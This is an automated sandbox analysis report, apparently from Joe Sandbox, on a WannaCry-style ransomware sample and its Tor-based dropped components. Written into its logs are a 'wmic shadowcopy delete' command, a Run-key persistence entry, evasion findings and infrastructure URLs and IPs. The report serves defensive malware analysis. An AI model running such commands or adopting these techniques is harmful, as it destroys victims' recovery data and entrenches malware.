Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040D300	31_2_0040D300
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040D4C0	31_2_0040D4C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040D300	34_2_0040D300
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040D4C0	34_2_0040D4C0

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Window / User API: threadDelayed 1992			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Window / User API: threadDelayed 6788			Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll			Jump to dropped file
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll			Jump to dropped file

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_31-5405
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_34-4667
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Evaded block: after key decision	graph_34-5519

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

API coverage: 8.5 %

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 4228	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 6060	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7836	Thread sleep count: 1992 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7836	Thread sleep time: -1992000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 8616	Thread sleep count: 6788 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 8616	Thread sleep time: -20364000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\taskdl.exe	Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	6_2_00401080
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	31_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	31_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	31_2_004026B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	34_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	34_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	34_2_004026B0
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91C027 FindFirstFileExA,	42_2_6F91C027

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Code function: 36_2_00D18B20 memset,GetSystemInfo,GetSystemInfo,__stack_chk_fail,

36_2_00D18B20

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD6DB9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD6DCE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD6DBA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SD6DCC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SD6DBB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD6DCD.tmp	Jump to behavior

Source: taskhsvc.exe, 00000024.00000002.5902711248.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: taskhsvc.exe, 00000024.00000003.2320386195.00000000073B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4hQpFIf62HGFSgFPpC9pEuCY6ucujJf6Ftb2YTL+QvzBv4j65ro8p+uPnTzWQTQb
Source: taskhsvc.exe, 00000024.00000002.5909934953.0000000004F62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3++WKQ4LBkCgYYTzLGeUrpsUEU8BAq9IVMCiXccDkwurLKWC/MNpAgMBAAE=
Source: taskhsvc.exe, 00000024.00000002.5927323155.00000000071E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: @WanaDecryptor@.exe, 0000001F.00000002.5897220648.00000000006D2000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950674496.0000000000707000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: taskhsvc.exe, 00000024.00000003.2327776125.0000000006272000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4Z7HsFL3Y/X5CqfwtTJvNNbhGfSyZTok9JiO/lGEurgMLddZED/0WVWtcZ/YAH7k

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_31-4684
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_31-4727
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_31-4738
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_31-5334
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_34-4733
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_34-4750
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	API call chain: ExitProcess graph end node	graph_34-5467

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

Process information queried: ProcessInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	System information queried: CodeIntegrityInformation

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

System information queried: KernelDebuggerInformation

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: 42_2_6F918EDD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

42_2_6F918EDD

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

31_2_00404B70

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: 42_2_6F9177A6 mov eax, dword ptr fs:[00000030h]

42_2_6F9177A6

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: 42_2_6F91CC77 GetProcessHeap,

42_2_6F91CC77

Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00BC11FD SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,	36_2_00BC11FD
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F918EDD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_6F918EDD
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91211B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_6F91211B
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F9124B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_6F9124B7

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\reg.exe base: 2F10000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\reg.exe base: 30622D8
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\reg.exe base: 30631E8

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

31_2_00401BB0

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: 42_2_6F9122FB cpuid

42_2_6F9122FB

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,		31_2_00406C20
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,		34_2_00406C20

Source: C:\Windows\SysWOW64\cscript.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Code function: 42_2_6F91203E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

42_2_6F91203E

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_0040BED0 #823,GetComputerNameA,GetUserNameA,

31_2_0040BED0

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,

31_2_00406F80

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,	31_2_0040D6A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,	34_2_0040D6A0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00BEC647 abort,abort,abort,_errno,bind,abort,connect,connect,__stack_chk_fail,	36_2_00BEC647
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00BEAF67 listen,listen,listen,__stack_chk_fail,	36_2_00BEAF67
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00BEB015 _errno,_errno,setsockopt,bind,bind,getsockname,abort,memcpy,abort,__stack_chk_fail,	36_2_00BEB015

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	21 Native API	12 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	21 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Clipboard Data	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Inhibit System Recovery
Email Addresses	DNS Server	Domain Accounts	At	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	1 Defacement
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 File Deletion	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	1 Multi-hop Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	2 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	121 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Services File Permissions Weakness	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_126.EXE.exe	100%	Avira	TR/Ransom.JB
LisectAVT_2403002A_126.EXE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	LNK/Runner.VPDJ
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML

Name	Source	Malicious
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	@WanaDecryptor@.exe, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	true
https://blog.torproject.org/blog/lifecycle-of-a-new-relayError	@WanaDecryptor@.exe, 0000001F.00000003.1866830058.000000000295F000.00000004.00000020.00020000.00000000.sdmp	false
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$	@WanaDecryptor@.exe, 0000001F.00000002.5895321498.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950146110.000000000019B000.00000004.00000010.00020000.00000000.sdmp	true
https://www.google.com/search?q=how	@WanaDecryptor@.exe, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	true
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000001F.00000002.5896223024.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	true
http://www.zlib.net/D	@WanaDecryptor@.exe, 0000001F.00000003.1866720891.0000000002858000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001F.00000003.1866570247.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip	@WanaDecryptor@.exe, 00000022.00000002.1950994575.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	true
https://sabotage.net	taskhsvc.exe, 00000024.00000003.2143314663.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000024.00000003.2147656639.000000000448B000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000024.00000003.2162919054.0000000003FF8000.00000004.00000020.00020000.00000000.sdmp	false
https://blog.torproject.org/blog/lifecycle-of-a-new-relay	@WanaDecryptor@.exe, 0000001F.00000003.1866830058.000000000295F000.00000004.00000020.00020000.00000000.sdmp	false
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B	@WanaDecryptor@.exe, 0000001F.00000002.5896223024.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.109.206.212	unknown	Netherlands	3265	XS4ALL-NLAmsterdamNL	false
192.87.28.28	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
185.11.180.67	unknown	Norway	20741	ADMINISTRATORNO	false
86.59.21.38	unknown	Austria	8437	UTA-ASAT	false
167.114.35.28	unknown	Canada	16276	OVHFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482512
Start date and time:	2024-07-26 00:14:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 27m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	LisectAVT_2403002A_126.EXE.exe
Detection:	MAL
Classification:	mal100.rans.evad.winEXE@40/988@0/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 182 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: LisectAVT_2403002A_126.EXE.exe

Simulations

Behavior and APIs

Time	Type	Description
00:22:35	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run njyalyugfohc920 "C:\Users\user\Desktop\tasksche.exe"
